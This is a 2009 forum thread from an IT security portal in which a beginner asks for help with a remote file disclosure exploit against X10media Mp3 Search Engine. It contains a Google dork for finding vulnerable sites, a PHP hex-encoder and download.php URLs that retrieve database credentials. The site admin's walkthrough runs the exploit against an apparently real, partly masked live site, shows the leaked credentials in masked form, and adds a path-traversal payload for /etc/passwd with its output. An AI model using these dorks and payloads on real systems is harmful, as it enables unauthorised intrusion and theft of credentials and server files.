Waraxe IT Security Portal
Login or Register
December 12, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 79
Members: 0
Total: 79
Full disclosure
SEC Consult SA-20241204-0 :: Multiple Critical Vulnerabilities in Image Access Scan2Net (14 CVE)
Microsoft Warbird and PMP security research - technical doc
Access Control in Paxton Net2 software
SEC Consult SA-20241127-0 :: Stored Cross-Site Scripting in Omada Identity (CVE-2024-52951)
SEC Consult SA-20241125-0 :: Unlocked JTAG interface and buffer overflow in Siemens SM-2558 Protocol Element, Siemens CP-2016 & CP-2019
Re: Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> Help the noob with "art of exploiting" xD
Post new topicReply to topic View previous topic :: View next topic
Help the noob with "art of exploiting" xD
PostPosted: Mon May 18, 2009 8:57 pm Reply with quote
Arxi
Beginner
Beginner
Joined: May 18, 2009
Posts: 3




Hello guys. I found this forum to be very supportove for newbs in exploiting.

Here is expoloit from x10media script. with insrtuctions. I don't get first part where i should encode URL. I runed script in cmd and all i get is "text copy" and nothing else. I am realy noob with exploits and i need help with this =)

Few questions: Should i keep site opened when running this php script?
i am doing right if I type in cmd >"php folder" then php expoit.php ?

I still have lot of questions but i will save it for later xD

SCRIPT AND INTRC:

################# ~THUNDER ################################################################


~X10media Mp3 Search Engine v1.5.5 - 1.6 Remote File Disclosure Vulnerability

~Founded by : THUNDER <t4h[at]hotmail.fr>
~Dork: "This search engine is in no way intended for illegal downloads. "
~File : Download.php

================================================================================
===========

to read files you need to encode the url, so you can use this php code :
<?
//Encode URL ** THUNDER **
function enc($string){
$hex='';
for ($i=0; $i < strlen($string); $i++){
$hex .= dechex(ord($string[$i]));
}
return $hex;
}
$thunder = $_GET[t];
echo enc($thunder);
?>

How to use : http://127.0.0.1/encode.php?t=[Url]
Ex : http://127.0.0.1/encode.php?t=includes/constants.php

##### ~Exploit ############################################################################


http://www.target.com/[path]/download.php?url=[Encoded url]

Example :
let's download the constants.php file wich contains the database login and password .
the file will be downloaded as .mp3 exstension .

http://www.target.com/[path]/download.php?url=696e636c756465732f636f6e7374616e74732e706870

Open the downloaded file with any text editor... ,and you got the database .



################################################################################
###########

Hope you can help me =)
View user's profile Send private message MSN Messenger
PostPosted: Tue May 19, 2009 11:55 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




First of all, you must search exploitable target. Use Google dork:

http://www.google.ee/search?hl=et&q=%22This+search+engine+is+in+no+way+intended+for+illegal+downloads.+%22&btnG=Google+otsing&lr=&aq=f&oq=

And try example from exploit against targets till you find working one.

http://www.p****d.com/download.php?url=696e636c756465732f636f6e7374616e74732e706870

Download that file and look inside - you can see database credentials:

Code:

/**
* Database Constants - these constants are required
* in order for there to be a successful connection
* to the MySQL database. Make sure the information is
* correct.
*/
define("DB_SERVER", "mysql.***com");
define("DB_USER", "p***d");
define("DB_PASS", "V***9");
define("DB_NAME", "p***");
define("DB_LINK", "db_link");


Now, you can dowload orther files too. Let's try "/etc/passwd".
Open encoder:

http://www.waraxe.us/sql-char-encoder.html

enter "../../../../../../../../../../etc/passwd" and hit "Encode now!".

Look for "MySql hex-encoded string":

Code:

0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764


and just delete first two chars, so that you will get this:

Code:

2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764


Then use it in exploit:

http://www.p******d.com/download.php?url=2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764

And you get what expected:

Code:

daemon:x:1:1:Owner of many system processes:/:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
games:x:5:100:games:/usr/games:/bin/false
man:x:6:100:man:/var/cache/man:/bin/false
...
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue May 19, 2009 12:26 pm Reply with quote
Arxi
Beginner
Beginner
Joined: May 18, 2009
Posts: 3




Preety nice wroten but i STILL dont get how to encode Url Embarassed

Here is what i done:

I run my xampp
I type http://localhost/encode.php?t=http://www.****.com/ (www.****.com is my target)
And i don't get nothing.

I know i am quite boring but if some1 have a few mins please help me
View user's profile Send private message MSN Messenger
PostPosted: Tue May 19, 2009 4:05 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Arxi wrote:
Preety nice wroten but i STILL dont get how to encode Url Embarassed

Here is what i done:

I run my xampp
I type http://localhost/encode.php?t=http://www.****.com/ (www.****.com is my target)
And i don't get nothing.

I know i am quite boring but if some1 have a few mins please help me


You got it all wrong Smile

This security vulnerability can be exploited manually. You only need web browser. That encoding script - it's just additional, optional utility. You can encode with that script, manually with ascii table or with sql encoder, as I did show before.
And you have to encode path of the file, you want to download, not website's url!
By the way it seems that you have not clue even about this exploit possibilities. It's remote file disclosure exploit, right? It will allow you to see, what's inside of files residing in target server. This type of exploit can reveal potentially sensitive information, but usually more steps are needed for effective attack.

And one more thing - don't post sensitive info here! That includes target urls!
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue May 19, 2009 4:33 pm Reply with quote
Arxi
Beginner
Beginner
Joined: May 18, 2009
Posts: 3




Gosh i just found hard truth Crying or Very sad

I don't even know what this script does.
Anyway txs for mins you spared to help me
View user's profile Send private message MSN Messenger
Help the noob with "art of exploiting" xD
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.046 Seconds